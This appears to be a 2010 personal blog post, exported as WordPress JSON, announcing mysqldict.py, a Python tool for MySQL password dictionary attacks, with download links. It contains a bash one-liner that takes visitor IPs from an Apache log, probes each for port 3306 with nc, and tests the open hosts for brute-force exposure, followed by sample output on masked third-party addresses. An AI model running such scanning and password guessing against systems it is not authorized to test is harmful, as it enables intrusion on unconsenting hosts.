{"id":117,"date":"2010-01-22T03:35:32","date_gmt":"2010-01-22T08:35:32","guid":{"rendered":"http:\/\/zitstif.no-ip.org\/?p=117"},"modified":"2010-01-22T03:36:01","modified_gmt":"2010-01-22T08:36:01","slug":"mysqldict-py","status":"publish","type":"post","link":"http:\/\/zitstif.no-ip.org\/?p=117","title":{"rendered":"mysqldict.py"},"content":{"rendered":"<p>After taking a few months to dilly about with Python and learn the ins and outs of it to a certain extent, I decided to write a program that does dictionary attacks on MySQL.<\/p>\n<p>Plain text:<br \/>\n<a title=\"http:\/\/zitstif.no-ip.org\/mysqldict.txt\" href=\"http:\/\/zitstif.no-ip.org\/mysqldict.txt\" target=\"_blank\">http:\/\/zitstif.no-ip.org\/mysqldict.txt<\/a><\/p>\n<p>Tar archive:<br \/>\n<a title=\"http:\/\/zitstif.no-ip.org\/mysqldict.tar\" href=\"http:\/\/zitstif.no-ip.org\/mysqldict.tar\" target=\"_blank\">http:\/\/zitstif.no-ip.org\/mysqldict.tar<\/a><br \/>\nMD5Sum: f0e07ca29cc783c6c27f3829f579d37e<\/p>\n<p>The beauty of this program is that it actually does a test on the remote host and tells you whether or not the remote host allows remote MySQL authentication.<\/p>\n<p>Here&#8217;s a quick peek of mysqldict.py in action used inside of a bash shell script (IP addresses hidden of course):<\/p>\n<pre lang=\"bash\">:~\/for i in $(httplast | egrep -v \"${WANIP}|127.0.0.1|192.168.\"  | awk '{print $1}' | sort | uniq); do nc -z -w1 ${i} 3306; if [[ \"$?\" == \"0\" ]]; then .\/mysqldict.py -t ${i}; fi; done\r\nmysqldict.py:\r\nPort 3306 on 115.##.##.#1 appears to be open..\r\nA connection has been made and here are the results of the test:\r\nThis host does not allow remote administration on MySQL\r\nmysqldict.py:\r\nPort 3306 on 62.##.##.#1 appears to be open..\r\nA connection has been made and here are the results of the test:\r\nThis host is open to MySQL dictionary attacks!\r\nmysqldict.py:\r\nPort 3306 on 66.##.##.#1 appears to be open..\r\nA connection has been made and here are the 
results of the test:\r\nThis host is open to MySQL dictionary attacks!<\/pre>\n<p>If you&#8217;re wondering what the command &#8216;httplast&#8217; is, let me explain. I&#8217;m too lazy to type out: <strong>cat \/var\/log\/apache2\/access.log<\/strong> , so I created an <strong>alias <\/strong>to handle this for me.<\/p>\n<p>The tool itself, I feel, is pretty self-explanatory, but if you have any questions feel free to leave a comment or shoot me an e-mail.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>After taking a few months to dilly about with Python and learn the ins and outs of it to a certain extent, I decided to write a program that does dictionary attacks on MySQL. Plain text: http:\/\/zitstif.no-ip.org\/mysqldict.txt Tar archive: http:\/\/zitstif.no-ip.org\/mysqldict.tar MD5Sum: f0e07ca29cc783c6c27f3829f579d37e The beauty of this program is that it actually does a test on &hellip; <a href=\"http:\/\/zitstif.no-ip.org\/?p=117\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">mysqldict.py<\/span> <span 
class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,3],"tags":[19,18],"class_list":["post-117","post","type-post","status-publish","format-standard","hentry","category-code","category-posts","tag-mysql","tag-mysqldict"],"_links":{"self":[{"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/posts\/117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=117"}],"version-history":[{"count":6,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/posts\/117\/revisions"}],"predecessor-version":[{"id":123,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/posts\/117\/revisions\/123"}],"wp:attachment":[{"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=117"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}